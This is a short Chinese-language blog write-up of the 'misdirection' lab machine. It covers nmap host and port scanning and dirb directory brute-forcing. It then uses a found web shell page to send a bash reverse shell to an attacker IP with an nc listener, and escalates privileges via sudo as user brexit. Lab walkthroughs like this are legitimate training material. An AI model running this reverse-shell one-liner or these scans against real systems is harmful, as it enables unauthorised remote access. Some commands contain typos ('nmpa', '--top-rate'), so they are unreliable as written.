misdirection --攻击面选择与信息收集的重要性

发布时间 2023-05-03 18:02:32作者: lisenMiller

主机发现

sudo nmap -sn 192.168.25.0/24    34

sudo nmap -sT --min-rate 10000 -p- 192.168.25.34 -oA nmapscan/ports

sudo nmap -sT -sC -sV -O -p 192.168.25.34 -oA nmapscan/detial

sudo nmap -sU --top-rate 20 192.168.25.34 -oA nmapscan/udp

sudo nmpa --script=vuln -p 192.168.25.34 -p22,80,3306,8080 -oA nmapscan/vuln

对http服务进行探测

访问主页80获得敏感信息

电子投票系统/power by web2py  

web2py并不是一个大型的网站,但是页面也很多吗,供给面的选择要通过浏览后挑选

并进行目录爆破

sudo dirb -u xx 

访问8080端口查看敏感信息 是apache的默认页

目录爆破

sudo dirb -u http:/xx:8080 -w 

爆破出一个shell页面,能够进行shell的连接

查看shell权限

whoami   id   ip a   sudo -l   uname -a

尝试能否用bash进行反弹shell到kali上

bash -c "/bin/bash -i >& /dev/tcp/192.168.28.29/1234 0>&1"

kali监听

nc -lvnp 1234

成功getshell

查看家目录是否有flag

查看计划任务cat /etc/crontab

sudo -l

 这意味着用户"brexit"被授权在不需要输入密码的情况下执行"/bin/bash"命令。也就是说,该用户可以在终端中直接使用sudo执行"/bin/bash",而不需要再输入密码。

所以直接提权  sudo -u brexit /bin/bash